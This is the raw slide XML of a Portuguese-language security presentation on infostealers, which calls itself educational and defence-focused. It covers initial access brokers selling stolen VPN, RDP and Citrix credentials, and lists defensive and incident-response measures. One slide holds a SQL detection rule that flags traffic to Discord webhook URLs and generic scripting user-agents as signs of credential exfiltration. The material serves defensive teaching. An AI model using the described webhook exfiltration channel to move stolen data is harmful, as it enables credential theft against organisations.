              <a:t>destination_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>source_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_agent</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a: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network_events</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a: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destination_url</a:t>
            </a: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00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LIKE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "https://discord.com/api/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>webhooks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/%"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a: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destination_url</a:t>
            </a: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00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LIKE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "https://discordapp.com/api/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>webhooks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/%"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR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 Exclui o processo legítimo do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3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Discord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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para reduzir falsos positivos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND</a:t>
            </a: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process_path</a:t>
            </a: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00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOT LIKE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AppData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%\Local\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Discord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\app-%\Discord.exe"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR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 Monitora </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3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User-Agents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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genéricos comuns em scripts de malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_agent</a:t>
            </a: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00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LIKE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>python-requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a: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user_agent</a:t>
            </a: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00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LIKE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "Go-http-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a: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user_agent</a:t>
            </a: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>
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IS NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);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3953367D-BB17-8D08-2BEB-A09D438BD5E3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803419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3C0C50-5A99-D686-C8A7-B06F45F4E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346B9E35-B2DD-EBA5-411D-BE4AA331B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4ED1897-BC5A-564C-B852-33118E17D7B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1504950"/>
            <a:ext cx="21404218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PÓS INFECÇÃO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353AC84-FB47-F2E0-6F8D-C163C1F62265}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20576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E6D2B860-0C90-7DD5-A5D0-2FECCDEC6E50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057637" y="4086030"/>
            <a:ext cx="20424299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O MERCADO DE IABs (INITIAL ACCESS BROKERS)</a:t>
            </a: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pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CRIMINOSOS QUE FILTRAM LOGS EM BUSCA DE CREDENCIAIS DE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VPN, RDP OU CITRIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a: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pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ELES FILTRAM POR DOMÍNIOS CORPORATIVOS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@EMPRESA.COM.BR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) E PRIVILÉGIOS DE CONTA (ADMIN DE DOMÍNIO).</a:t>
            </a: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pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NÃO VENDEM APENAS A SENHA, MAS O "ACESSO GARANTIDO" À REDE INTERNA DA EMPRESA.</a:t>
            </a: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DF434B90-3D6E-BCFF-A915-C14AD6A63D70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0463699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C5A2D8-7AD3-42A5-E8D7-F319F53B7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6DE37D49-D361-8021-D64E-44CDE56C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D9A3840-FA9C-DEAE-F7C9-A4CBD7F58A19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1504950"/>
            <a:ext cx="21404218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PÓS INFECÇÃO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294D03D-2FD6-ABF8-D999-A93F627250F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20576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327A924-7324-3C6D-C4A5-96E09364D7D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057637" y="4086030"/>
            <a:ext cx="20424299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lang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Imagem 6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BAA0DC7-0295-E1A2-1C09-2B8BE96C2B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80" r="9710" b="4726"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5171745" y="3218627"/>
            <a:ext cx="14871204" cy="10061600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8823546F-2EE1-BACD-0F13-12755721B1BA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8020409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44F41F-F720-64E8-15E6-478FBF01A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65B87B74-256E-C28E-A3CB-6AFC85B0B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0EFBF5F-8CB7-799C-CF4D-9E276FBBE235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1504950"/>
            <a:ext cx="21404218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PÓS INFECÇÃO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986D9A9-C899-788F-07A4-F88C3B69A0C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20576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28A7DDEA-4820-44CA-BAA9-9A62785EDD2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057637" y="4086030"/>
            <a:ext cx="20424299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lang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Imagem 7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EC5D6D97-719F-F842-D6D1-D44B79C25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238" y="3295364"/>
            <a:ext cx="11479365" cy="9117460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Imagem 9" descr="Texto&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{057D5D34-CBD6-573B-D8BA-19A53536F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35435" y="3295364"/>
            <a:ext cx="6547497" cy="9084224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896825AF-0A63-E432-5E0A-2842D9727911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9167886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F64803-0539-7F7E-22DE-15898B47B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A7AA68F6-9BA6-F5A2-2D8C-761E7AFAD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00B9E30-BE96-7771-8DE8-8E17C49B50A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1504950"/>
            <a:ext cx="21404218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PÓS INFECÇÃO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973C0DE-C70F-2037-9492-0706349F150C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20576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349135F-84BC-794A-5F29-BD6C3D166CAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057637" y="4086030"/>
            <a:ext cx="20424299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O MERCADO DE IABs (INITIAL ACCESS BROKERS)</a:t>
            </a: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pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CRIMINOSOS QUE FILTRAM LOGS EM BUSCA DE CREDENCIAIS DE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VPN, RDP OU CITRIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a: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pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ELES FILTRAM POR DOMÍNIOS CORPORATIVOS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@EMPRESA.COM.BR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) E PRIVILÉGIOS DE CONTA (ADMIN DE DOMÍNIO).</a:t>
            </a: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pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NÃO VENDEM APENAS A SENHA, MAS O "ACESSO GARANTIDO" À REDE INTERNA DA EMPRESA.</a:t>
            </a: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80D0ED41-DB12-4E3A-6DE4-E01F0EB6D32B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5333822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3C8112-D1E7-F749-1880-C60161893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6FD5F71F-2810-6246-2849-DC532D405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83F506F-6299-7BA2-E83F-3FB80F5AFACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1504950"/>
            <a:ext cx="21404218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PÓS INFECÇÃO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1E798FA-5607-F447-31E2-74DD8687A751}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20576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BDA219B-CD7C-6D08-5DDC-CACDAC78A0E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057637" y="4086030"/>
            <a:ext cx="20424299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PRECIFICAÇÃO (PRIVILÉGIO DO ACESSO, RECEITA DA EMPRESA, SETOR, ETC)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ALGUNS FÓRUNS REALIZAM LEILÕES DOS ACESSOS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pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A CROWDSTRIKE REPORTOU UM CRESCIMENTO DE 38% A 50% NOS ANÚNCIOS DE IABS NA AMÉRICA LATINA ENTRE 2024 E 2025.</a:t>
            </a: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pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CERCA DE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>79% DAS INTRUSÕES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> AGORA SÃO "MALWARE-FREE", OU SEJA, O CRIMINOSO USA CREDENCIAIS LEGÍTIMAS COMPRADAS DE UM IAB PARA ENTRAR</a:t>
            </a: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D8FA3E1E-72D9-825E-FF04-AE6997463920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7469831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1A27B8-B18A-C0EC-D522-C3BDF9208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0F12CA63-EEE6-8A8A-443D-29178F66A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5B8DDFD-A460-B1A0-61F4-0E863A1F6907}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1504950"/>
            <a:ext cx="21404218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PÓS INFECÇÃO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C4CAB4E-1CA8-4445-8C24-005E4B1AFA91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20576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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Imagem 6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EEC3B0EA-E30A-C9B3-08AE-B5D2C5313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237" y="4381499"/>
            <a:ext cx="21368045" cy="550894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F31F7EA-6DC0-6B37-A191-3FB02D6FAC03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6655012" y="10222153"/>
            <a:ext cx="11077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2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Mercado de vendas de acessos. Fonte: RBR</a:t>
            </a:r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597D25CB-EDF4-101B-9F45-A1231128B0EE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1344446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C627E7-73C9-4299-AD8F-3C542C32A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77E0D979-461E-AC60-237B-C9C512D26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0C5BBFA-9B6B-D511-0C86-5B7DE0BA5D70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1504950"/>
            <a:ext cx="21404218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ESTRATÉGIAS DE DEFESA E MITIGAÇÃO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ED3D965-6F0F-6D31-CB55-1A2AF58F8701}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20576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3393AA25-B214-EBA5-B533-DBBE1D2B8CB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057637" y="4086030"/>
            <a:ext cx="20424299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PROIBIÇÃO DE ARMAZENAMENTO NATIVO (GPO)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USO DE GERENCIADORES DE SENHAS CORPORATIVO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LIMPEZA DE COOKIES E SESSÕES (T1185)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CONTROLE DE APLICAÇÕES (BINÁRIOS NÃO ASSINADOS/DIRETÓRIOS TEMP)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ATIVAÇÃO DO CREDENTIAL-GUARD (T1003)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ANÁLISE HEURÍSTICA VIA EDR/XDR</a:t>
            </a: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POLÍTICAS DE BYOD RÍGIDAS</a:t>
            </a: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GESTÃO DE ACESSOS RÍGIDA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E98D7CB8-56B1-2F0A-503F-5225373FFF30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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Imagem 7" descr="Texto sobre foto de menina&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB0BE432-3115-6A68-A897-E0946721D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450" y="8796337"/>
            <a:ext cx="58578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5147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CFECE4-662A-C30D-935B-0A570C2A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42EB6596-7EF8-89E8-AEE8-0F6C1DEAB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81D41B7-1163-FB21-C003-E2F9DE53389B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1504950"/>
            <a:ext cx="21404218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RESPOSTA À INCIDENTES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01D6CF0-533D-DA44-CE77-AC81E7A9838C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20576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64C35A1F-82CE-FCC2-A90A-A1C9A9372D50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057637" y="4086030"/>
            <a:ext cx="20424299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ASSINAR SERVIÇOS DE MONITORAMENTO (DARK WEB)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CRIAÇÃO DE REGRAS DE DETECÇÃO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800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ISOLAMENTO DA REDE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REVOGAÇÃO IMEDIATA DE SESSÕES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RESET DE SENHAS SISTÊMICO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FORMATAÇÃO DE ENDPOINTS INFECTADOS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ANÁLISE FORENSE / ANÁLISE DE MALWARE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ENFORCEMENT MFA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07228E68-DBBF-B6E6-147F-BD1DD02AA6AB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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Imagem 7" descr="Homem com a boca aberta&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{691EDF8C-6FF7-4EC7-482D-A24187787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6432" y="8057585"/>
            <a:ext cx="8828511" cy="495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2869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0FE7C2-FEF7-C257-4D66-1B812624E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A0EDAB8D-7BB5-6105-E3FA-339A831F9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F131A9E-9D7E-EB57-F696-4FCA13210752}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1504950"/>
            <a:ext cx="21404218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CONCLUSÃO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91956ED-444F-F149-DA4C-A31A75B104C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20576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319BF697-7319-DB9B-E42F-610FC5840246}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057637" y="4086030"/>
            <a:ext cx="20424299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IDENTIDADE É O NOVO PERÍMETRO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INFOSTEALER &gt; IAB &gt; RANSOMWARE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GESTÃO DE SESSÕES E MFA RESISTENTES A PHISHING (FIDO2)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AUDITORIA DE NAVEGADORES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r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MONITORAMENTO CREDENCIAIS (DARK WEB)</a:t>
            </a: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endParaRPr lang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRP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E89610BB-4446-6432-3036-F62B5F08C92D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861106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AFD58F-C294-12CC-6CD0-778F26E0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D81E3F5E-1988-A5DE-0C32-83CF24D0E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6570D7C8-400A-FC3F-5E82-8A3EA233C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3652500"/>
            <a:ext cx="24387048" cy="63500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Text 0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5F993AD-65F5-DDDA-CA50-D7D30430CC05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1715309" y="4820038"/>
            <a:ext cx="21947123" cy="520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pt-BR" sz="5400" kern="0" spc="150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ED145B">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Gotham HTF Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Gotham HTF Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Gotham HTF Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>EDUCACIONAL: Conteúdo focado em Defesa e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="5400" kern="0" spc="150" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="ED145B">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Gotham HTF Medium" pitchFamily="34" charset="0"/>
